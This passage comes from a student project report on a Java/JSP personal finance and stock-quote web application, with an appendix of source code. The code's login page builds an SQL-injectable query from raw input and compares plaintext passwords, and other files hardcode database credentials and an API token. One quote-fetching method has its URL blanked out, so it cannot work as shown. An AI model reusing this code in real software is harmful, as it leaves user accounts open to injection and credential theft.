<tr> <td>8</td> <td>Get Top Trading Stock List</td> </tr>
<tr> <td>9</td> <td>Time and Sales Report</td> </tr>
<tr> <td>10</td> <td>Reminder Setup Page</td> </tr>
<tr> <td>11</td> <td>Debt Reduction Planning Page</td> </tr>
<tr> <td>12</td> <td>Expenditure Analysis Page</td> </tr>
<tr> <td>13</td> <td>Account Information Page</td> </tr>
<tr> <td>14</td> <td>Balance Check Book Page</td> </tr>
</tbody>
</table>

CHAPTER ONE
SOFTWARE REQUIREMENTS SPECIFICATION

1.1 Introduction

Almost everybody earns money in this world, but very few of them actually spend it in a wise way. There is no doubt that managing finances will help anybody to have a secure and safe financial future. I have attempted to solve this problem by creating a Real-Time Finance Management System (RFMS), wherein users can easily manage their finances. RFMS will also help users to learn more about stocks. They can create a sample portfolio of stocks and monitor them closely to see which direction their picked stocks are headed.
Graphs have been provided in the system for them to easily visualize and see the numbers in a clear perspective. Apart from stocks, RFMS helps the users to manage their finances using the different finance management tools and calculators provided. This is a Java/XML based approach where real-time market data from different stock exchanges is fetched and displayed for the user. This is done internally using a data access layer. The information we get is in an XML format which is taken by the Java program and displayed using Java Server Pages. The project divides finance management into four general categories: Portfolio Management, Reminders, Debt Management, and Account Management. Each of these categories has different tools to help users with their finances.

1.2 Purpose of the Project

The purpose of the project was to develop an online finance management system where users can learn about and manage their stock portfolio and personal finances, which would help them have control over their investments, personal finances and debts.

1.3 Context of the Problem

The context of the problem was to address the issues of personal finance management, and the problem of not being able to manage everything from one place. Previously, proprietary software had to be installed on every computer the users wanted to use for managing their finances.

1.4 Related Work

There has been a lot of work done in the field of personal finance management software, but most of it targets stand-alone systems where the users usually have to buy and install proprietary software on their computer.

1.5 Significance of the Project

RFMS was developed to provide a one-stop place for dealing with most of the problems in personal finance management. The users are under no obligation to use this tool a set number of times. Based on their present situation, users can use the different tools provided in the system.
1.6 Assumptions and Limitations

The following assumptions and limitations were made regarding the project:

1. To manage accounts using RFMS, users need to enter their daily transactions into the system.
2. Users have all the required data for Credit Card Pay-Down, such as Beginning Balance, Annual Percentage Rate and the Minimum Payment amounts.
3. Users should have at least a very basic knowledge about stocks and managing portfolios.
4. The interest calculations used in the system are either Simple Interest or Compound Interest calculations.

1.7 Definition of Terms

5. J2EE - Java 2 Platform, Enterprise Edition. Sun's Java platform for multi-tier server-oriented enterprise applications.

6. JDK - Java Development Kit. A free Sun Microsystems product which provides the environment required for programming in Java. The JDK is available for a variety of platforms, such as Sun Solaris, Microsoft Windows and Linux.

7. JVM - Java Virtual Machine. Software that interprets and executes the byte code in Java class files.

8. JDBC - Java Database Connectivity. A programming interface that lets Java applications access a database via the SQL language.

9. JSP - JavaServer Pages. An extension to the Java servlet technology from Sun Microsystems that provides a simple programming vehicle for displaying dynamic content on a web page.

10. JavaBean - A component architecture for the Java programming language, developed initially by Sun, but now available from several other vendors. JavaBeans components are called "Beans".

11. JavaScript - A scripting language that is widely supported in web browsers and other web tools. It adds interactive functions to HTML pages, which are otherwise static.

12. XML - The Extensible Markup Language (XML) is a W3C-recommended general-purpose markup language for creating special-purpose markup languages. It is a simplified subset of SGML, capable of describing many different kinds of data.
Its primary purpose is to facilitate the sharing of data across different systems, particularly systems connected via the Internet. Languages based on XML (for example, RDF, RSS, MathML, XHTML, SVG, and cXML) are defined in a formal way, allowing programs to modify and validate documents in these languages without prior knowledge of their form.

13. JAXP - The Java API for XML Parsing is an optional API provided by JavaSoft. It provides basic functionality for reading, manipulating, and generating XML documents through pure Java APIs. It is a thin and lightweight API that provides a standard way to seamlessly integrate any XML-compliant parser with a Java application.

14. JDOM - JDOM is a Java-based document object model for XML that integrates with the Document Object Model (DOM) and the Simple API for XML (SAX), and uses parsers to build the document.

15. XERCES - Xerces is a set of parsers compatible with the Extensible Markup Language (XML). Xerces parsers are available for Java and C++, implementing the World Wide Web Consortium (W3C) XML, Document Object Model (DOM), and Simple API for XML (SAX) standards.

16. SAX - The Simple API for XML is an event-driven, serial-access mechanism for accessing XML documents. It provides a standardized interface for the interaction of applications with many XML tools. SAX uses two basic types of objects: parsers and document handlers.

17. SOAP - The Simple Object Access Protocol is a lightweight protocol for exchange of information in a decentralized, distributed environment. It is an XML based protocol that consists of three parts: an envelope, a set of encoding rules, and a convention for representing remote procedure calls and responses.

18. DOM - The Document Object Model (DOM) is a form of representation of structured documents as an object-oriented model. DOM is the official World Wide Web Consortium (W3C) standard for representing structured documents in a platform- and language-neutral manner.
The DOM is also the basis for a wide range of application programming interfaces, some of which are standardized by the W3C.

19. REST - Representational State Transfer is a model for web services based solely on HTTP. REST takes the view that the Web already has everything necessary for web services, without having to add extra specifications like SOAP and UDDI. Any item can be made available (i.e. represented) at a URI and, subject to the necessary permissions, it can be manipulated using one of the simple operations defined within HTTP (GET to retrieve information, PUT and POST to modify it, DELETE to remove it).

20. RFMS - Real-Time Finance Management System. This is the name of the directories where the .jsp files of RFMS are stored in Tomcat. The same name has been used for the database of RFMS as well.

CHAPTER TWO
SOFTWARE DESIGN

2.1 Introduction

Chapter Two consists of a discussion of the software design. Specifically, RFMS is a JSP based system that resides on a three-tier architecture. The front-end was based on JSP, and the back-end was a MySQL database. The connections to the database are made through JavaBeans with a JDBC connection.

2.2 Preliminary Design

RFMS is a system designed for users to manage their finances using the tools provided in the system. It was developed to overcome the following issues:

1. Getting the price for one stock at a time and basically managing your own portfolio of stocks.
2. Using actual money to learn and play around with stocks. This is an expensive mistake; users should have a lot of knowledge before they get into the stock market.
3. Using different reminder systems and still forgetting to pay bills on time.
4. Paying more interest than required on loans such as student loans, car loans, and mortgages.
5. Difficulty in analyzing information from budget creation and maintenance.
6. Overdrawing and ruining your credit by the simple mistake of not balancing your check book, as it requires too many calculations.
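Several of the issues above (loan interest, debt pay-down) reduce to simple compound-interest arithmetic. As a purely hypothetical sketch, not the thesis's code: assuming monthly compounding at APR/12 and a fixed monthly payment, the number of months needed to clear a credit-card balance can be estimated like this:

```java
// Hypothetical sketch in the spirit of the Debt Reduction Planning tool:
// months needed to pay off a balance with a fixed monthly payment, assuming
// monthly compounding at APR/12. Class name and formula conventions are ours.
public class PayDownPlanner {
    static int monthsToPayOff(double balance, double apr, double monthlyPayment) {
        double monthlyRate = apr / 12.0;
        int months = 0;
        while (balance > 0) {
            // accrue one month of interest, then apply the payment
            balance = balance * (1 + monthlyRate) - monthlyPayment;
            months++;
            if (months > 1200) return -1; // payment too small to ever finish
        }
        return months;
    }

    public static void main(String[] args) {
        // $1,000 at 18% APR, paying $100/month
        System.out.println(monthsToPayOff(1000.0, 0.18, 100.0)); // 11
    }
}
```

The guard against a payment smaller than the monthly interest is what distinguishes a usable planner from a naive loop: without it, the balance grows forever.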
A robust, flexible, and user-friendly system was needed, and RFMS was an implementation that solved most of these issues. Choosing the architecture was an important part. RFMS uses a 3-tier architecture that provides the user interfaces through the web browser. All the user interfaces are divided based on user type. The users are of two types:
- System Administrator
- User
The use case diagrams showing the individual functions of all the users are given in the following figures:
Figure 1. Administrator Use Case Diagram
Figure 2. User Use Case Diagram

2.3 Detailed Design
Architecture: RFMS has a 3-tier architecture. A 3-tier architecture was chosen because a 2-tier architecture combines the presentation logic and the business logic in one tier, called the client side, while the other tier, called the server, provides the database. The 3-tier architecture separates the business logic from the presentation logic and has the database in the third tier. This architecture is very flexible and highly scalable.
Figure 3. 3-Tier Architecture Diagram
A. Client Tier: Java-enabled web browsers are used as the client tier. The user sends requests via the browser. The browser sends the request to the JavaBeans residing at the application server, which process the request and send the result back to the browser, which in turn interprets the information it receives from the server and displays it graphically for the client.
B. Middle Tier: The middle tier is also known as the application server. RFMS was designed to run in the Jakarta Tomcat 5.0.30 web server. Tomcat supports JSP and JavaBeans, which are the programming techniques used in the system.
C. Database Server Tier: The database tier is the back-end server where the data is stored. RFMS uses MySQL version 4.0.23-nt. MySQL provides very fast joins using an optimized one-sweep multi-join. MySQL is connected to Tomcat using a MySQL JDBC driver.
Programming Technique and Language: The programming language used by RFMS was Java and its JSP technology. The JSP standard was developed by Sun Microsystems as an alternative to Microsoft's Active Server Pages (ASP) technology. JSP pages are similar to ASP pages in that they are compiled on the server, rather than in a user's Web browser. However, JSP is Java-based, whereas ASP is Visual Basic-based. JSP pages are useful for building dynamic Web sites and accessing database information on a Web server. Though JSP pages may have Java interspersed with HTML, all the Java code is executed on the server. Therefore, once the page gets to the browser, it is only HTML. JavaScript, on the other hand, is usually interpreted by the Web browser, not the Web server. The other benefits of JSP that made it a choice over other technologies are:
1. JSP separates program logic from the presentation.
2. JSP pages have the "Write Once, Run Anywhere" property. By virtue of their ultimate translation to Java byte code, JSP pages are platform independent. This means that JSP pages can be developed on any platform and deployed on any server.
3. JSP pages also make it easy to embed reusable components like JavaBeans that perform specialized tasks. JavaBeans are developed once and can be used in any number of Java Server Pages.
4. JSP technology has become a part of J2EE, which brings Java technology to enterprise computing. Using JSP pages for constructing a website, we can create the front-end component of the kind of powerful N-tier applications made possible by J2EE.
5. JSP has custom tag libraries that make it highly extensible.
These numerous characteristics of JSP made it a good choice for RFMS. The JavaBeans used in RFMS are:
1. StockInfo
2. Users
3. UsersAdmin
4. TimeAndSales
5. TopList
6. DateBean
7. Reminder
8. DebtPlanner
9. Expenditure
10. AccountInfo

2.4 System Setup
RFMS's development system involved the following steps:
1. Installation of J2SDK 1.4.2_06.
The Java 2 SDK is a development environment for building applications, applets, and components using the Java programming language. The Java 2 SDK includes tools useful for developing and testing programs written in the Java programming language and running on the Java platform. These tools are designed to be used from the command line. Except for the appletviewer, these tools do not provide a graphical user interface.
2. Install Tomcat, the Servlet/JSP container. RFMS uses Tomcat version 5.0.30, which implements the Servlet 2.4 and JavaServer Pages 2.0 specifications from the Java Community Process, and includes many additional features that make it a useful platform for developing and deploying web applications and web services.
3. Install the MySQL database server. RFMS uses MySQL version 4.0.23-nt. The MySQL software delivers a very fast, multi-threaded, multi-user, and robust SQL (Structured Query Language) database server. MySQL Server is intended for mission-critical, heavy-load production systems as well as for embedding into mass-deployed software.
4. Install a JDBC driver. RFMS uses MySQL Connector/J, which is a native Java driver that converts JDBC (Java Database Connectivity) calls into the network protocol used by the MySQL database. It lets developers working with the Java programming language easily build programs and applets that interact with MySQL and connect all corporate data, even in a heterogeneous environment. MySQL Connector/J is a Type IV JDBC driver and has a complete JDBC feature set that supports the capabilities of MySQL.
5. Make changes in the server.xml and web.xml files in the application server to establish connectivity between Tomcat and MySQL.
6. Test the web application.
The client can have any operating system, such as a Windows 95/98/NT/2000/XP workstation, Mac OS, OS/2, UNIX, Linux, etc.
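Step 5 above is typically done by declaring a JNDI DataSource. A minimal sketch for Tomcat 5.0 follows; the resource name matches the web.xml fragment shown in the appendix, while the URL, username, and password values are illustrative placeholders.

```xml
<!-- server.xml, inside the rfms <Context>: a pooled MySQL DataSource.
     The url/username/password values here are illustrative placeholders. -->
<Resource name="jdbc/rfms" auth="Container" type="javax.sql.DataSource"/>
<ResourceParams name="jdbc/rfms">
  <parameter><name>driverClassName</name><value>com.mysql.jdbc.Driver</value></parameter>
  <parameter><name>url</name><value>jdbc:mysql://localhost:3306/rfms</value></parameter>
  <parameter><name>username</name><value>mac</value></parameter>
  <parameter><name>password</name><value>rfms</value></parameter>
</ResourceParams>

<!-- web.xml: the matching resource reference (the appendix shows this entry). -->
<resource-ref>
  <res-ref-name>jdbc/rfms</res-ref-name>
  <res-type>javax.sql.DataSource</res-type>
  <res-auth>Container</res-auth>
</resource-ref>
```

With this in place, code in the middle tier can look the pool up through JNDI instead of opening raw DriverManager connections.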
The browsers that the client can use for viewing HTML documents and using RFMS are Netscape Navigator 3.0 or higher or Microsoft’s Internet Explorer 3.x or higher.

2.5 Summary
The software design of the project was presented in Chapter Two, which described the underlying structure of the application. RFMS is a 3-tier web application that provides interfaces in HTML for the clients. The data is retrieved from a MySQL database through JavaBeans and sent to the browsers by JSP pages.

CHAPTER THREE SYSTEM VALIDATION

3.1 Introduction
This chapter describes the procedures by which RFMS - Real-Time Finance Management System was tested and the results gathered from them. It was tested on Microsoft’s Internet Explorer browser.

3.2 Unit Test Plan
RFMS - A Real-Time Finance Management System is a web-based application that helps users manage their finances using the tools provided in the system. Users can input their financial information online and analyze it irrespective of where they are. As part of the Unit Test Plan, RFMS was tested based on the user types, since each user type has its own set of interfaces. All the interfaces are web based and available through the browser. As part of the unit test plan, these steps were taken and results found:
1. All the hyperlinks available in each set of interfaces of RFMS were checked, irrespective of the content that they provide. It was found that all of them work.
2. User data input was given to check if the presentation logic worked. The presentation logic was implemented in JavaScript, which checks whether the input taken from the users is valid. The display was in HTML. The interfaces of RFMS that required user input successfully validated it.
3. There are error pages that display the errors based on the functionality.
4. JavaScript displays input errors in alert boxes.
5. The basic rules of web-based applications regarding readability and presentation for each set of interfaces were verified.
The data and content were readable and displayed in a user-friendly manner.

3.3 Integration Test Plan
As part of the Integration Test Plan, RFMS was tested for functionality based on user type. Each user type has its own interfaces; after being tested as single units for presentation, they were tested for functionality. The functions of each user are as follows:
A. Systems Administrator:
• Create user account
• Edit user account
• Delete user account
• View user information
B. User:
• Manage Portfolio
• Setup Reminders
• Debt Reduction Planning
• Account Information
Every set of functions is available on the left hand side of the browser as a menu. The following tests were performed and results obtained:
1. RFMS’s user interfaces were tested for content across each page depending on the functionality.
2. Every function of each user was tested.
3. A user was created through the administrator pages. After the information was entered, the functions of editing, deleting, and finally viewing all information were exercised. RFMS’s Systems Administrator pages passed these tests successfully.
4. The user functionality was tested for bugs and limitations. Each function was checked for content and the right response.
5. Certain limitations were found, which have been documented, and the bugs were fixed.
6. The portfolio management section was checked to see if it was able to get data over the internet from the Island website. This test passed successfully.
7. The Reminder section was thoroughly tested to see if it was able to send outgoing email at the exact specified time; it was able to do so without any problem.
8. The different tools in the debt reduction planning section were checked to see if all the formulas used there were correct. The system was able to perform these tasks even with wrong input values.
9. The account information page was checked to see if the balance check book tool matches a real balance book.
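The balance behaviour exercised in item 9 (and again in the system tests, where editing an earlier entry must recompute everything after it) can be sketched in a few lines. The class and method names below are invented for illustration and are not RFMS's actual AccountInfo bean.

```java
import java.util.ArrayList;
import java.util.List;

public class CheckBookSketch {

    // A transaction is a signed amount: credits positive, debits negative.
    // Recomputing all running balances from scratch is what keeps the book
    // consistent when the user edits an earlier entry.
    public static List<Double> runningBalances(double opening, List<Double> txns) {
        List<Double> balances = new ArrayList<>();
        double balance = opening;
        for (double t : txns) {
            balance += t;
            balances.add(balance);
        }
        return balances;
    }

    public static void main(String[] args) {
        List<Double> txns = new ArrayList<>(List.of(-40.0, 100.0, -25.0));
        System.out.println(runningBalances(200.0, txns)); // [160.0, 260.0, 235.0]
        txns.set(0, -50.0); // the user corrects the first entry...
        System.out.println(runningBalances(200.0, txns)); // ...and all later balances shift: [150.0, 250.0, 225.0]
    }
}
```

This is the calculation the system performs for the user, so that, as the chapter puts it, all the user has to do is enter the transactions.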
3.4 System Test Plan
As part of the System Test Plan, the following tests were performed:
1. The JSP server and the MySQL server were started, and the system start page was opened in the browser successfully.
2. Tested that unauthorized users cannot view pages. They cannot get past the login page.
3. Tested whether XML queries are being processed properly; they were processed as expected.
4. Tested whether the reminder email system was able to send out emails and found that it did so without any problems.
5. The graphs on the expenditure analysis page need data for two months to be able to display the comparison; the page gives an error message if data for at least two months is not available.
6. The balance check book section was tested to verify that, if a user modifies an earlier entry, the system recalculates all the entries again. The test was passed.

CHAPTER FOUR MAINTENANCE

4.1 Introduction
This chapter provides the measures that need to be taken to maintain RFMS - A Real-Time Finance Management System. Maintenance needs to be done if:
1. Issues arise on the front-end of the application or in the back-end programming.
2. Issues arise with the tools utilized for development.
3. Issues arise with the directory structure of the application.

4.2 Maintenance Guidelines
These guidelines aim at providing the information for maintenance issues that might arise with the front end of the application, depending on the user type, as well as with the programming and servers at the back end of the application.

4.2.1 Interfaces Management
The programming has been done in JSP and Java, and RFMS has been tested for all its functionality. But if issues arise, the webmaster will have to know Java, JSP, JavaScript, XML, and MySQL to troubleshoot problems in the business logic of the application.

4.2.2 Administration
A Systems Administrator/webmaster is needed to create, edit, or delete accounts.

4.3 Tools Utilized
RFMS was developed using the following tools:
1.
Tomcat Web Server
2. MySQL Database Server
3. Java 2 Standard Development Kit
4. JDBC Driver
5. Macromedia Dreamweaver

4.4 Directory Structure
RFMS used Apache's Jakarta Tomcat server as the JSP/Servlet container. The web application was developed in the "webapps" sub-directory of the Jakarta Tomcat main directory. It was stored in a directory under "webapps" called "rfms". The files present at each directory level:
rfms directory - All the .jsp and .html files are saved here. The naming convention followed can be explained by the example of the create user admin page:
1. Presentation page: createUser.jsp.
2. JavaScript code for user-input validation: createUserCheck.jsp.
3. JSP servlet page for communication with the JavaBeans that insert the data: createUserInsert.jsp.
The common files used by all the users are placed directly under "rfms", but all the other pages are placed in sub-directories based on their user type first and then their functionality. The sub-directories under "rfms" are:
1. admin - The administrator pages.
2. portfolio - The stock management pages.
3. reminder - The email reminder pages.
4. debt - The debt reduction planning pages.
5. expenditure - The expenditure analysis pages.
6. accountInfo - The account information pages.
7. web-inf - This directory has the .java files stored in it, and the respective .class files are stored in a sub-directory package in it called rfms_modules.

CHAPTER FIVE IMPLEMENTATION

5.1 Introduction
This chapter provides details about the implementation of the project by describing some of the interfaces used in the project. RFMS's front-end was made as user-friendly as possible. JavaScript was used on the client side to check the validity of the user's input. Error messages were reported appropriately wherever needed. The Real-Time Finance Management System - RFMS was developed to help users control and plan their finances. Various aspects of finance are considered in the project. These include:
1.
Portfolio Management
2. Reminder Setup
3. Debt Reduction Planning
4. Expenditure Analysis
5. Account Information
Apart from these pages there was a system login process, which was required to authenticate users.

5.2 System Interfaces
5.2.1 Login
The login process authenticates users based on the username and password provided by them.
Figure 5. Login Page

5.2.2 Portfolio Management
This section has three tools in it:
1. Get Quote
2. Get Top Trading List
3. Get Time and Sales Report for a Stock
Figure 6. Portfolio Management Page
The three tools provided in this section get updated real-time market information when the markets are open.
Figure 7. Get Stock Quote Page
The get quote section retrieves a quote and market information based on the symbol provided by the user.
Figure 8. Get Top Trading Stock List
This page gets the top 20 trading list by default. If needed, we can ask the system to get up to 500 top trading stocks at that time. The time and sales page gets the last 25 matched deals for a particular stock. Again, 25 is just the default; the maximum number of matched deals it can retrieve in one call is 100.

5.2.3 Reminder Setup
This section consists of setting up reminders for oneself. The system sends out an email on the day the reminder is set for. Here the users were able to set reminders for themselves. The system allowed them to set up to two reminders for each event.

5.2.4 Debt Reduction Planning
This section has a loan calculator to figure out the details of any loan. You could get information like how much interest you will pay over the term of the loan or what your monthly loan payments will be.
Figure 11. Debt Reduction Planning Page
Just by entering a few details, such as the loan amount, the term, and the interest rate, users could get valuable information such as the monthly payments and the total interest they will be paying over the life of the loan.
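The figures described above follow the standard amortization formula M = P·r / (1 − (1+r)^(−n)), where P is the principal, r the monthly interest rate, and n the number of payments. The sketch below is a generic illustration of that formula, not RFMS's actual DebtPlanner code.

```java
public class LoanSketch {

    // principal: loan amount; annualRate: e.g. 0.06 for 6% APR; months: term length.
    public static double monthlyPayment(double principal, double annualRate, int months) {
        double r = annualRate / 12.0;              // periodic (monthly) rate
        if (r == 0) return principal / months;     // interest-free edge case
        return principal * r / (1 - Math.pow(1 + r, -months));
    }

    // Total interest is simply everything paid beyond the principal.
    public static double totalInterest(double principal, double annualRate, int months) {
        return monthlyPayment(principal, annualRate, months) * months - principal;
    }

    public static void main(String[] args) {
        // $10,000 over 5 years at 6% APR
        System.out.printf("monthly:  %.2f%n", monthlyPayment(10000, 0.06, 60));
        System.out.printf("interest: %.2f%n", totalInterest(10000, 0.06, 60));
    }
}
```

For the sample inputs this gives a monthly payment of about $193.33 and roughly $1,599.68 of interest over the life of the loan, which is exactly the kind of output the Debt Reduction Planning page presents to the user.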
5.2.5 Expenditure Analysis
This is the section where users enter their monthly expenses; they can then use this information to see graphs and charts of their expenses so that they can better analyze their budget for the upcoming months. Here the users enter their monthly expenses based on the categories provided. The users also had the ability to add new categories that are specific to them.

5.2.6 Account Information
This section has a balance check book tool. It lets users balance their check books from anywhere. Calculations are done for the user by the system. All the user has to do is enter the transactions.
Figure 13. Account Information Page
This is the page where the users enter their transactions. Based on the transaction type, the system determines whether it was a debit or credit transaction, and calculations are done on that basis.
Figure 14. Balance Check Book Page
This page displays the user's balance book. It also gives the ability to edit a previous transaction or to enter new transactions.

CHAPTER SIX CONCLUSIONS AND FUTURE DIRECTIONS

6.1 Conclusions
RFMS - A Real-Time Finance Management System is a personal finance management system which provides real-time market data from stock exchanges. When the stock exchange is open, the data is delayed by less than 15 minutes. Users can use RFMS to learn more about stocks in general and learn to trade by using virtual money. RFMS also provides users with other tools, such as a reminder system that sends email reminders about events, a few loan calculators, a budgeting system that graphs the user’s expenses, and a balance check book tool. Passing XML data over HTTP is the latest in EDI (Electronic Data Interchange) standards. Java combined with XML provides developers with powerful tools to develop internet-based applications. The real-time stock data is retrieved using the REST architecture. REST - Representational State Transfer is a model for web services based solely on HTTP.
REST takes the view that the Web already has everything necessary for web services, without having to add extra specifications like SOAP and UDDI. RFMS used Java and XML to get this data using the REST architecture. Part of this data was stored in a database. A MySQL database was used to store users’ calculations so that they don’t have to enter them the next time they use the system.

6.2 Future Directions
Personal finance management software is used by almost everyone these days to keep track of their finances. A typical person could have multiple bank accounts, multiple credit cards, a few investment accounts, and lots of bills. So this field is here to stay, and many more tools will be required by people in the future. In the future, not only stock information but also bank, credit card, and bill information could be transferred over the internet using the REST architecture. This will help users transport their data from one system to another without any problems. Technology-wise, Servlets and Java Struts were not used in RFMS, but if the application is expanded to include more tools, using them would be beneficial. Also, utilizing XML to the fullest will make development and maintenance easier to manage. Tools: the more the better. There is no limit on the number of different tools that could be provided for the users. Dealing with variable loans and mortgages and creating amortization tables for them will help users see what part of their money is actually going towards the principal. Taxes: one more limitless field. Tools could be provided which keep track of users’ expenses and at the end of the year prepare a statement that would help users file their taxes. Finally, and once again, use XML to send data back and forth between applications. The value of XML cannot be stressed enough; XML makes the task of transferring data from one application to another a breeze.
APPENDIX SOURCE CODE OF JAVA CLASSES

Here is the source code from some of the files used in the Real-Time Finance Management System.

**database.java**

```java
// Java Document
package rfms_modules;
import java.sql.*;

public class database {
    private static String url = "jdbc:mysql://localhost/rfms";
    private static String driver = "com.mysql.jdbc.Driver";
    private static String user = "mac";
    private static String password = "rfms";

    public static Connection getConnection() throws Exception {
        Class.forName(driver).newInstance();
        //System.out.println("driver Loaded");
        Connection connection = DriverManager.getConnection(url, user, password);
        //System.out.println("connection established");
        return connection;
    }
}
```

**DateBean.java**

```java
// Java Document
package rfms_modules;
import java.io.*;
import org.jdom.*;
import org.jdom.input.*;
import org.jdom.output.*;
import java.util.*;
import java.util.Date;

public class DateBean {
    public static void main(String[] args) {
        //System.out.println(getSingleQuote("MSFT"));
    }

    public static Date getDate(String symbol) {
        return new java.util.Date();
    }

    public static String getSingleQuote(String symbol) {
        String name = "";
        return (name);
    }
}
```

StockInfo.java
// Java Document for quote.xml
package rfms_modules;
import java.io.*;
import org.jdom.*;
import org.jdom.input.*;
import org.jdom.output.*;
import java.util.*;
import org.apache.xerces.parsers.*;

public class StockInfo {
    public static String marketSession = "";
    public static String matchedShares = "";
    public static String matchPrice = "";
    public static String matchTime = "";

    public StockInfo() {
        marketSession = "";
        matchedShares = "";
        matchPrice = "";
        matchTime = "";
    }

    public static String getMarketSession() { return marketSession; }
    public static String getMatchedShares() { return matchedShares; }
    public static String getMatchPrice() { return matchPrice; }
    public static String getMatchTime() { return matchTime; }
    public static void setMarketSession(String ms) { marketSession = ms; }
    public static void
setMatchedShares(String ms2) { matchedShares = ms2; }
    public static void setMatchPrice(String mp) { matchPrice = mp; }
    public static void setMatchTime(String mt) { matchTime = mt; }

    public static void main(String[] args) {
        System.out.println(getSingleQuote("ORCL"));
        System.out.println("" + getMatchPrice());
        System.out.println("Date: " + getDate());
    }

    public static Date getDate() {
        return (new java.util.Date());
    }

    public static String getSingleQuote(String symbol) {
        String name = "";
        try {
            // NOTE: the quote.xml request URL was truncated in the original listing.
            String x = "";
            Document d = new SAXBuilder().build(x);
            List children = d.getRootElement().getChildren();
            for (int i = 0, size = children.size(); i < size; i++) {
                Element child = (Element) children.get(i);
                name += child.getName();
                name += "<br>";
            }
            Element temp = d.getRootElement().getChild("stock").getChild("matched");
            setMarketSession(temp.getAttribute("marketSession").getValue());
            setMatchedShares(temp.getChild("matchedShares").getValue());
            setMatchPrice(temp.getChild("lastMatch").getChild("matchPrice").getValue());
            setMatchTime(temp.getChild("lastMatch").getChild("matchTime").getValue());
        } catch (Exception e) {
            e.printStackTrace();
            return ("There was an exception" + e);
        }
        return (name);
    }
} // end class StockInfo

TimeAndSales.java
// Java Document for timeandsales.xml
package rfms_modules;
import java.io.*;
import org.jdom.*;
import org.jdom.input.*;
import org.jdom.output.*;
import java.util.*;
import org.apache.xerces.parsers.*;

public class TimeAndSales {
    public static void main(String[] args) {
        Document d1 = buildDocument("MSFT", 20);
        //displayTopList(d1);
    } // end main

    public static Date getDate() {
        return new java.util.Date();
    } // end getDate

    public static Document buildDocument(String symbol, int recNumb) {
        if (recNumb <= 0) {
            recNumb = 20;
        }
        try {
            String timeAndSales = "http://xml.island.com/ws/xml/timeandsales.xml?token=TXHE3PCsMdCGBWd7&symbol=" + symbol + "&recNumb=" + recNumb;
            Document doc = new SAXBuilder().build(timeAndSales);
            return (doc);
        } catch (Exception e) {
            e.printStackTrace();
            String str = "There was an exception" + e;
            Element error = new Element("ERROR");
            error.addContent(str);
            Document d = new Document(error);
            return (d);
        }
    } // end buildDocument
} // end class TimeAndSales

TopList.java
// Java Document for toplist.xml
package rfms_modules;
import java.io.*;
import org.jdom.*;
import org.jdom.input.*;
import org.jdom.output.*;
import java.util.*;
import org.apache.xerces.parsers.*;

public class TopList {
    //this is for test purposes only
    public static void main(String[] args) {
        Document d1 = buildDocument(20);
        displayTopList(d1);
    } // end main

    public static Date getDate() {
        return new java.util.Date();
    } // end getDate

    public static Document buildDocument(int recNumb) {
        if (recNumb == 0) {
            recNumb = 20;
        }
        try {
            String topListUrl = "http://xml.island.com/ws/xml/toplist.xml?token=TXHE3PCsMdCGBWd7&recNumb=" + recNumb;
            Document doc = new SAXBuilder().build(topListUrl);
            return (doc);
        } catch (Exception e) {
            e.printStackTrace();
            String str = "There was an exception" + e;
            Element error = new Element("ERROR");
            error.addContent(str);
            Document d = new Document(error);
            return (d);
        }
    } // end buildDocument

    public static void displayTopList(Document d) {
        System.out.println("\n\n\n\n\n");
        //System.out.println(d.getRootElement());
        Element stockList = d.getRootElement().getChild("stockList");
        List stocks = stockList.getChildren();
        for (int i = 0, size = stocks.size(); i < size; i++) {
            Element stock = (Element) stocks.get(i);
            System.out.print(stock.getAttribute("rank").getValue());
            System.out.println(stock.getAttribute("symbol").getValue());
            System.out.println(stock.getChild("market").getValue());
            System.out.println(stock.getChild("booked").getChild("bookedShares").getValue());
        }
    } // end
displayTopList } // end class TopList

loginVerify.jsp
<%@ page contentType="text/html; charset=iso-8859-1" language="java" import="java.sql.*" errorPage="" %>
<%@ page import="rfms_modules.*"%>
<%@ page session="true"%>
<%
String username = request.getParameter("username");
String password = request.getParameter("password");
boolean foundRecord = false;
boolean matched = false;
try {
    Connection con = database.getConnection();
    Statement st = con.createStatement();
    ResultSet rs = st.executeQuery("select password,role from user where username='" + username + "'");
    foundRecord = rs.first();
    if (foundRecord && password.equals(rs.getString("password"))) {
        matched = true;
    }
    if (foundRecord && matched) {
        session.setAttribute("username", username);
        if (rs.getString("role").equals("admin")) {
            response.sendRedirect("admin.jsp");
        } else {
            response.sendRedirect("user.jsp");
        }
    } else {
        response.sendRedirect("index.jsp?login=0");
    }
} catch (Exception e) {
    // a missing record or database error sends the user back to the login page
    response.sendRedirect("index.jsp?login=0");
}
%>

getTopList.jsp
<%@ page import="rfms_modules.*"%>
<%@ page import="org.jdom.*, org.jdom.input.*, org.apache.xerces.parsers.*, java.sql.*, java.util.List"%>
<%@ page language="java" contentType="text/html"%>
<%@ page autoFlush = "true"%>
<%@ page session = "false"%>
<jsp:useBean id="tl" scope="page" class="rfms_modules.TopList"/>
<html>
<head>
<title>Real-Time Finance Management System - Portfolio Management</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
</head>
<body vLink=#ffe4ca aLink=#ffffff link=#ffffff background="./images/blueground.gif" text="#FFFFFF">
<TABLE width=500 border=0 align="center" cellPadding=0 cellSpacing=0>
<TBODY>
<TR>
<TD height="74" align=middle vAlign=center>
<font color="#0066FF" size="4" face="Georgia, Times New Roman, Times, serif">Real-Time Finance Management System</font></TD>
</TR>
</TBODY>
</TABLE>
<table align="center" width="100%"> <tr> </tr> </table>
<table align="left" cellpadding="8" cellspacing="2" width="100%">
<tr>
<td width="14%"> <table
align="center" cellpadding="8" cellspacing="2" width="100%">
<tr> <td><div align="center"><font color="#FFFFFF" size="-1" face="Arial, Helvetica, sans-serif"><strong><a href="../index.html">Home</a></strong></font></div></td> </tr>
<tr> <td><div align="center"><font color="#FFFFFF" size="-1" face="Arial, Helvetica, sans-serif"><strong>Portfolio</strong></font></div></td> </tr>
<tr> <td><div align="center"><font color="#FFFFFF" size="-1" face="Arial, Helvetica, sans-serif"><strong><a href="reminders/index.html">Reminders</a></strong></font></div></td> </tr>
<tr> <td><div align="center"><font color="#FFFFFF" size="-1" face="Arial, Helvetica, sans-serif"><strong><a href="debt/index.html">Debt Planning</a></strong></font></div></td> </tr>
<tr> <td><div align="center"><font color="#FFFFFF" size="-1" face="Arial, Helvetica, sans-serif"><strong><a href="expenditures/index.html">Expenditures</a></strong></font></div></td> </tr>
